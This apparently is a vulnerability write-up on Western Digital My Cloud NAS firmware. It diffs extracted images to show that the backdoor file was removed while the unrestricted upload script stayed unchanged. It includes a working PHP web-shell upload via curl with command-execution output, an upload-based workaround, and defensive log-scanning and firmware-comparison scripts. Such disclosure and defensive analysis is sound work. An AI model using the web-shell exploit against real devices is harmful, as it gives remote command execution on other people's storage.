Description of vulnerabilities: WDMyCloud Multiple Vulnerabilities
- More details on unrestricted file upload vulnerability: https://www.exploitee.rs/index.php/Western_Digital_MyCloud#.2Fjquery.2Fuploader.2Fmulti_uploadify.php_.28added_08.2F06.2F2017.29
- Metasploit for file upload vulnerability: https://packetstormsecurity.com/files/145447/wd_mycloud_multiupload_upload.rb.txt
Both critical vulnerabilities (the hard-coded backdoor and the unrestricted file upload) have been corrected as of 2018-01-12 with the following firmware versions:
| My Cloud device | Firmware |
|---|---|
| Mirror | 2.11.169 |
| EX2 | 2.11.169 |
| EX4 | 2.11.169 |
| My Cloud | 2.30.181 |
| EX2 Ultra | 2.30.181 |
| Mirror Gen2 | 2.30.181 |
| EX2100 | 2.30.181 |
| EX4100 | 2.30.181 |
| DL2100 | 2.30.181 |
| DL4100 | 2.30.181 |
| PR2100 | 2.30.181 |
| PR4100 | 2.30.181 |
It appears that Western Digital simply removed the offending files from the firmware to correct the vulnerabilities:
```
$ wget http://download.wdc.com/nas/My_Cloud_BZVM_2.11.169.bin
$ binwalk -e My_Cloud_BZVM_2.11.169.bin
$ ls _My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
ls: cannot access '_My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php': No such file or directory
$ ls _My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/cgi/nas_sharing.cgi': No such file or directory
```
Workaround until a fixed firmware is installed (the upload script itself is used to place an .htaccess rule that disables it):

- Set your My Cloud device IP:

```
mycloudip=192.168.0.1
```

- Block multi_uploadify.php with an .htaccess file:

```
printf "RewriteRule ^web/jquery/uploader/multi_uploadify.php - [L,R=404]\n" > /tmp/.htaccess
curl -v "http://$mycloudip/web/jquery/uploader/multi_uploadify.php?folder=/var/www/" -F "Filedata[]=@/tmp/.htaccess"
```

- Verify multi_uploadify.php returns a 404 code:

```
$ curl -I "http://$mycloudip/web/jquery/uploader/multi_uploadify.php"
HTTP/1.1 404 Not Found
```
Setup
```
sudo apt install binwalk
wget http://download.wdc.com/nas/My_Cloud_BZVM_2.11.164.bin
wget http://download.wdc.com/nas/My_Cloud_BZVM_2.11.168.bin
binwalk -e My_Cloud_BZVM_2.11.164.bin
binwalk -e My_Cloud_BZVM_2.11.168.bin
```
01 - Unrestricted file upload: vulnerability not remediated
```
$ diff _My_Cloud_BZVM_2.11.164.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
$
```
```
$ printf "<?php echo system(\$_GET['cmd']); ?>" > /tmp/phpshell.php
$ curl -v "http://192.168.0.1/web/jquery/uploader/multi_uploadify.php?folder=/var/www/" -F "Filedata[]=@/tmp/phpshell.php"
*   Trying 192.168.0.1...
* Connected to 192.168.0.1 (192.168.0.1) port 80 (#0)
> POST /web/jquery/uploader/multi_uploadify.php?folder=/var/www/ HTTP/1.1
> Host: 192.168.0.1
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 245
> Expect: 100-continue
> Content-Type: multipart/form-data; boundary=------------------------9bdc535de1b1c15e
>
< HTTP/1.1 100 Continue
< HTTP/1.1 302 Found
< Date: Sun, 07 Jan 2018 20:18:43 GMT
< Server: Apache
< X-Powered-By: PHP/5.4.16
< Location: ?status=1
< Content-Length: 0
< Content-Type: text/html
< Content-Language: en
* HTTP error before end of send, stop sending
<
* Closing connection 0
$ curl 'http://192.168.0.1/phpshell.php?cmd=ls%20%2F'
CacheVolume
bin
dev
etc
home
lib
linuxrc
lost+found
mnt
nfs
opt
proc
root
sbin
shares
sys
system
tmp
usr
var
```
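A defender-side check for the request pattern shown above, added here as an example (it is not part of the original writeup): it scans Apache combined-format access log lines for POSTs to the upload script whose `folder` parameter points outside the data shares or contains a `..` component. The `/shares/` prefix for legitimate uploads and the log lines themselves are constructed assumptions.

```shell
#!/bin/sh
# Added example, not part of the original writeup: scan Apache combined-format
# access logs for POSTs to the upload script whose destination folder lies
# outside the data shares (the request shown above targets /var/www/) or
# contains a ".." component. The "/shares/" prefix for legitimate uploads and
# the log lines below are constructed assumptions.

UPLOAD_PATH='/web/jquery/uploader/multi_uploadify.php'
ALLOWED_PREFIX='/shares/'

# suspicious_uploads: reads log lines on stdin, prints "<client ip> <decoded folder>"
# for every upload request that deserves a look (a missing folder is reported too,
# since the destination is then unknown).
suspicious_uploads() {
    awk -v path="$UPLOAD_PATH" -v ok="$ALLOWED_PREFIX" '
    # dec(s): percent-decode a URL component (portable awk, no gawk extensions)
    function dec(s,    out, c, h, hex) {
        hex = "0123456789abcdef"; out = ""
        while (s != "") {
            c = substr(s, 1, 1)
            if (c == "%" && length(s) >= 3) {
                h = tolower(substr(s, 2, 2))
                out = out sprintf("%c", (index(hex, substr(h, 1, 1)) - 1) * 16 + index(hex, substr(h, 2, 1)) - 1)
                s = substr(s, 4)
            } else { out = out c; s = substr(s, 2) }
        }
        return out
    }
    # combined format: $1 client, $6 quoted method, $7 request URI
    $6 == "\"POST" && index($7, path) == 1 {
        folder = "(none)"
        if (match($7, /[?&]folder=[^& ]*/))
            folder = dec(substr($7, RSTART + 8, RLENGTH - 8))
        if (folder == "(none)" || index(folder, ok) != 1 || index(folder, "..") > 0)
            print $1, folder
    }'
}

# Constructed sample: an upload into the web root, a legitimate upload into a
# share, the follow-up request to the dropped script, and a traversal attempt.
SAMPLE_LOG='192.168.0.50 - - [07/Jan/2018:20:18:43 +0000] "POST /web/jquery/uploader/multi_uploadify.php?folder=/var/www/ HTTP/1.1" 302 0 "-" "curl/7.47.0"
192.168.0.23 - - [07/Jan/2018:20:20:01 +0000] "POST /web/jquery/uploader/multi_uploadify.php?folder=%2Fshares%2FPublic%2F HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.0.50 - - [07/Jan/2018:20:21:10 +0000] "GET /phpshell.php?cmd=ls%20%2F HTTP/1.1" 200 143 "-" "curl/7.47.0"
192.168.0.23 - - [07/Jan/2018:20:22:00 +0000] "POST /web/jquery/uploader/multi_uploadify.php?folder=%2Fshares%2F..%2F..%2Fvar%2Fwww HTTP/1.1" 302 0 "-" "Mozilla/5.0"'

printf '%s\n' "$SAMPLE_LOG" | suspicious_uploads
```

On the sample it reports the first and fourth lines only; the share upload passes and the GET to the dropped script is out of scope for this rule.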
02 - Hard coded backdoor: vulnerability remediated
```
$ ls _My_Cloud_BZVM_2.11.164.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
_My_Cloud_BZVM_2.11.164.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
$ ls _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/cgi/nas_sharing.cgi': No such file or directory
```
Setup
```
wget http://download.wdc.com/nas/My_Cloud_BWVZ_2.30.165.bin
wget http://download.wdc.com/nas/My_Cloud_BWVZ_2.30.172.bin
binwalk -e My_Cloud_BWVZ_2.30.165.bin
binwalk -e My_Cloud_BWVZ_2.30.172.bin
```
01 - Unrestricted file upload: vulnerability appears to not be remediated
```
$ diff _My_Cloud_BWVZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BWVZ_2.30.172.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
$
```
02 - Hard coded backdoor: vulnerability remediated
```
$ ls _My_Cloud_BWVZ_2.30.165.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
_My_Cloud_BWVZ_2.30.165.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
$ ls _My_Cloud_BWVZ_2.30.172.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BWVZ_2.30.172.bin.extracted/squashfs-root/cgi/nas_sharing.cgi': No such file or directory
```
Setup
```
wget http://download.wdc.com/nas/My_Cloud_BVBZ_2.30.165.bin
wget http://download.wdc.com/nas/My_Cloud_BVBZ_2.30.174.bin
binwalk -e My_Cloud_BVBZ_2.30.165.bin
binwalk -e My_Cloud_BVBZ_2.30.174.bin
```
01 - Unrestricted file upload: vulnerability appears to not be remediated
```
$ diff _My_Cloud_BVBZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
$
```
02 - Hard coded backdoor: vulnerability remediated
```
$ ls _My_Cloud_BVBZ_2.30.165.bin.extracted//squashfs-root/cgi/nas_sharing.cgi
_My_Cloud_BVBZ_2.30.165.bin.extracted//squashfs-root/cgi/nas_sharing.cgi
$ ls _My_Cloud_BVBZ_2.30.174.bin.extracted//squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BVBZ_2.30.174.bin.extracted//squashfs-root/cgi/nas_sharing.cgi': No such file or directory
```
The hard-coded backdoor vulnerability appears to have been remediated in the latest versions of My Cloud firmware due to the file nas_sharing.cgi having been removed. However, I see no evidence that the unrestricted file upload vulnerability was remediated in any version of the My Cloud firmware. In particular, there have been no changes to the file multi_uploadify.php between any recent versions of the firmware, and the file is identical between My_Cloud_BVBZ_2.30.165.bin (where GulfTech confirmed the vulnerability) and My_Cloud_BVBZ_2.30.174.bin (where the vulnerability was supposedly remediated):
```
$ diff -s _My_Cloud_BVBZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
Files _My_Cloud_BVBZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php and _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php are identical
```
I can confirm the unrestricted file upload vulnerability is present in firmware My_Cloud_BZVM_2.11.168.bin (see above), and multi_uploadify.php is also the same between that version and My_Cloud_BVBZ_2.30.174.bin:
```
$ diff -s _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
Files _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php and _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php are identical
```
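The presence and diff checks repeated above for each firmware pair, folded into one script as an added example (not the author's code): given two `binwalk -e` extraction roots it reports whether nas_sharing.cgi is still shipped and whether multi_uploadify.php was removed, changed, or left byte-for-byte identical. The relative paths are the ones observed above; the trees built by `demo()` are constructed stand-ins, not real firmware contents.

```shell
#!/bin/sh
# Added example, not part of the original writeup: after `binwalk -e` has
# unpacked two firmware images (as in the Setup steps above), compare the
# two artifacts this writeup tracks and print a one-line verdict per issue.
# The relative paths are the ones observed above; the sample trees built by
# demo() are constructed stand-ins, not real firmware contents.

UPLOADER=web/pages/jquery/uploader/multi_uploadify.php
BACKDOOR=cgi/nas_sharing.cgi

# file_status ROOT RELPATH -> "present" or "absent"
file_status() {
    if [ -f "$1/$2" ]; then echo present; else echo absent; fi
}

# compare_uploader OLD_ROOT NEW_ROOT -> "removed", "identical" or "changed".
# "identical" is the result to worry about: the script is still shipped with
# no change at all, so the upload issue cannot have been fixed inside it.
compare_uploader() {
    if [ ! -f "$2/$UPLOADER" ]; then echo removed
    elif cmp -s "$1/$UPLOADER" "$2/$UPLOADER"; then echo identical
    else echo changed
    fi
}

# verdict OLD_ROOT NEW_ROOT -> two summary lines, one per tracked issue
verdict() {
    echo "backdoor ($BACKDOOR): $(file_status "$2" "$BACKDOOR") in new firmware"
    echo "uploader ($UPLOADER): $(compare_uploader "$1" "$2") between versions"
}

# demo: constructed trees mirroring what the 2.30.165 -> 2.30.174 comparison
# showed (nas_sharing.cgi removed, multi_uploadify.php identical).
demo() {
    tmp=$(mktemp -d)
    for v in old new; do mkdir -p "$tmp/$v/$(dirname "$UPLOADER")" "$tmp/$v/cgi"; done
    echo '<?php /* stand-in uploader */ ?>' > "$tmp/old/$UPLOADER"
    echo 'stand-in cgi binary' > "$tmp/old/$BACKDOOR"
    cp "$tmp/old/$UPLOADER" "$tmp/new/$UPLOADER"
    verdict "$tmp/old" "$tmp/new"
    rm -rf "$tmp"
}

demo
```

To check a real pair, replace the `demo` call with `verdict _OLD.bin.extracted/squashfs-root _NEW.bin.extracted/squashfs-root`.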